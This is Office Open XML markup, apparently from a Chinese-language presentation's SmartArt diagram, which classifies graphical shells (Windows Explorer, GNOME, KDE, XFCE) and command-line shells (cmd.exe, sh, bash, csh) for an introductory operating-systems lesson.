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73" r:id="rId8"/>
    <p:sldId id="274" r:id="rId9"/>
    <p:sldId id="275" r:id="rId10"/>
    <p:sldId id="276" r:id="rId11"/>
    <p:sldId id="268" r:id="rId12"/>
    <p:sldId id="269" r:id="rId13"/>
    <p:sldId id="271" r:id="rId14"/>
    <p:sldId id="272" r:id="rId15"/>
    <p:sldId id="270" r:id="rId16"/>
    <p:sldId id="277" r:id="rId17"/>
    <p:sldId id="279" r:id="rId18"/>
    <p:sldId id="278"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99" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="86" d="100"/>
          <a:sy n="86" d="100"/>
        </p:scale>
        <p:origin x="-10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47DA17-A5E5-4BC2-8DFC-7B11CE6C97A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8AAE7D8D-24C2-4068-A549-0D48E257AEF8}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="ctr" rtl="0"/>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0" smtClean="0">
            <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            <a:ea typeface="+mj-ea"/>
            <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr algn="ctr" rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" sz="2400" b="0" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>图形</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" sz="2400" b="0" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>界面</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="0" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>Shell</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" sz="2400" b="0" dirty="0">
            <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            <a:ea typeface="+mj-ea"/>
            <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{858C3DAA-5D1D-4D14-B89E-F675AFA9DDA7}" type="parTrans" cxnId="{1F82468E-E266-4C6B-8F31-98EEEE0197E2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{70913E2C-1393-40E6-9EDF-1A6808D1CABC}" type="sibTrans" cxnId="{1F82468E-E266-4C6B-8F31-98EEEE0197E2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{431BC681-CD9B-42FA-A12F-3B1B27A55543}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>（</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>Graphical User Interface shell </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>即 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>GUI shell</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>）</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" dirty="0">
            <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            <a:ea typeface="+mj-ea"/>
            <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{949812DF-C2A5-45D2-A2CF-60E58CEB60FC}" type="parTrans" cxnId="{5CA819F0-FA01-4613-9C3C-7FC9E2F771DE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{06E2F153-65D5-4091-B00D-262F6168EF21}" type="sibTrans" cxnId="{5CA819F0-FA01-4613-9C3C-7FC9E2F771DE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C46A76FB-474A-4C97-9B42-08274FA84722}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>Windows Explorer </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>（微软的</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>windows</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>系列操作系统）</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" sz="1400" dirty="0">
            <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            <a:ea typeface="+mj-ea"/>
            <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4258FF67-F15D-4F8A-B982-15ED3DB3AA2C}" type="parTrans" cxnId="{D6B7EA47-9704-40F7-A1A0-6A015C325422}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{88CD8B17-AAD6-4D4D-A3B9-A0CBA011AC0B}" type="sibTrans" cxnId="{D6B7EA47-9704-40F7-A1A0-6A015C325422}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{845385E1-CFB3-477C-B457-8A30DE052816}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1400" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>(Linux Shell)  </a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" sz="1400" dirty="0">
            <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            <a:ea typeface="+mj-ea"/>
            <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CFE59144-2A41-41A9-8116-77E5E900860F}" type="parTrans" cxnId="{26141D70-4789-4EB5-A999-3F35F0F51903}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{473C2F29-099C-4D59-A5F2-3F2844F48D01}" type="sibTrans" cxnId="{26141D70-4789-4EB5-A999-3F35F0F51903}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A0B963EB-98F4-459A-93A2-9FC3DBD2684B}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1600" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>X Window Manager (GNOME, KDE,XFCE)</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" sz="1600">
            <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            <a:ea typeface="+mj-ea"/>
            <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{98B17F1E-39E0-4575-AC40-477739FD54DC}" type="parTrans" cxnId="{C81A7C5D-D9A2-4608-9130-27B02321753A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{194C1FC0-5F3D-467F-AB45-F8875B1A5DF9}" type="sibTrans" cxnId="{C81A7C5D-D9A2-4608-9130-27B02321753A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{20209EDD-63C0-486E-8AB5-C75E84696078}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="ctr" rtl="0"/>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0" smtClean="0">
            <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            <a:ea typeface="+mj-ea"/>
            <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr algn="ctr" rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" sz="2400" b="0" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>命令行</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" sz="2400" b="0" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>式</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="0" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>Shell</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" sz="2400" b="0" dirty="0">
            <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            <a:ea typeface="+mj-ea"/>
            <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{71046995-B974-47C8-ADEA-72CB3C71699C}" type="parTrans" cxnId="{9E3C3406-0646-4441-B8B1-000546FFA36D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0C01C89F-2C10-4E05-B0AF-F32E3BB9E8CF}" type="sibTrans" cxnId="{9E3C3406-0646-4441-B8B1-000546FFA36D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C5EB5ACE-09E2-48BC-91A7-C4A39A36C23D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>（</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>Command Line Interface shell </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>，即</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>CLI shell</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>）</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" dirty="0">
            <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            <a:ea typeface="+mj-ea"/>
            <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3AC7B26C-CFE2-4DA7-9339-102098809CA2}" type="parTrans" cxnId="{30A8C6DB-FA31-4AF1-8B11-79DF356A80F8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4B8630FD-6DBF-4C76-AD43-B4DBE120DA83}" type="sibTrans" cxnId="{30A8C6DB-FA31-4AF1-8B11-79DF356A80F8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6758B4E4-4CFB-44B2-B049-6CE77E0DDFB4}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1400" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>Cmd.exe (MSDOS)</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" sz="1400">
            <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            <a:ea typeface="+mj-ea"/>
            <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B9E4BE1B-7D9F-406B-80D5-8D625308439F}" type="parTrans" cxnId="{69BD493D-715D-4F8B-BB26-00878AFB155A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1D983436-B004-4500-95B5-7D0ED62ACB63}" type="sibTrans" cxnId="{69BD493D-715D-4F8B-BB26-00878AFB155A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B9922BB9-6F08-4676-8B0D-CFFE2EB09100}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1400" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>Sh (Bourne shell)</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" sz="1400">
            <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            <a:ea typeface="+mj-ea"/>
            <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B0760E7D-66F8-43F3-B62E-7B18F654E417}" type="parTrans" cxnId="{E7AE3492-5539-4109-8C55-59ED42A5B759}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{79A2C5E5-3559-4105-ACFC-B94556083F97}" type="sibTrans" cxnId="{E7AE3492-5539-4109-8C55-59ED42A5B759}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{89B4C7B0-0C66-413F-8384-1B6D413A9DAD}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>Bash (Bourne again shell)</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" sz="1400" dirty="0">
            <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            <a:ea typeface="+mj-ea"/>
            <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F49CD662-60C4-40D7-B869-88CEBE22FAED}" type="parTrans" cxnId="{2D4BF19B-DEBD-45E4-889D-4F524BC38997}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2B329AD7-421B-459B-B4E2-DF97D0353203}" type="sibTrans" cxnId="{2D4BF19B-DEBD-45E4-889D-4F524BC38997}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8916B9CA-526B-4FD5-8028-EE2A66E1A358}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>Csh</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t> (C Shell)</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" sz="1400" dirty="0">
            <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            <a:ea typeface="+mj-ea"/>
            <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4ABDC6AC-8A86-4DEF-B43E-90E779B9FCF4}" type="parTrans" cxnId="{D300FF5A-B721-47F2-BE46-BB47F6F91C86}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{77E59CD9-9BE6-4836-9302-25EF8D3AB376}" type="sibTrans" cxnId="{D300FF5A-B721-47F2-BE46-BB47F6F91C86}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A2360FB3-FCC0-4C83-A963-FC41010ECE57}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
            <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            <a:ea typeface="+mj-ea"/>
            <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>传统意义上的</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>shell</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>指的是命令行式的</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>shell</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" sz="2000" dirty="0">
            <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            <a:ea typeface="+mj-ea"/>
            <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1DFF5516-7739-4081-8E07-20DE2B02C6EB}" type="parTrans" cxnId="{6402EFA8-9DA8-4633-9185-411E2E68F5FA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0CEA254A-1B57-4A1A-94FE-0ADDCE398F47}" type="sibTrans" cxnId="{6402EFA8-9DA8-4633-9185-411E2E68F5FA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0FDB2CC5-A0DC-4C3E-A0C1-631FEC7CA1B7}" type="pres">
      <dgm:prSet presAssocID="{5B47DA17-A5E5-4BC2-8DFC-7B11CE6C97A3}" presName="vert0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animOne val="branch"/>
          <dgm:animLvl val="lvl"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{58CE8812-6162-42BA-8D7E-4E887975D3FF}" type="pres">
      <dgm:prSet presAssocID="{8AAE7D8D-24C2-4068-A549-0D48E257AEF8}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="0" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8943A3A5-7B77-4323-8C6E-33143E5F575B}" type="pres">
      <dgm:prSet presAssocID="{8AAE7D8D-24C2-4068-A549-0D48E257AEF8}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CB6A50C8-3CFC-4B73-8301-88CE47E78D84}" type="pres">
      <dgm:prSet presAssocID="{8AAE7D8D-24C2-4068-A549-0D48E257AEF8}" presName="tx1" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="12" custScaleX="500000"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
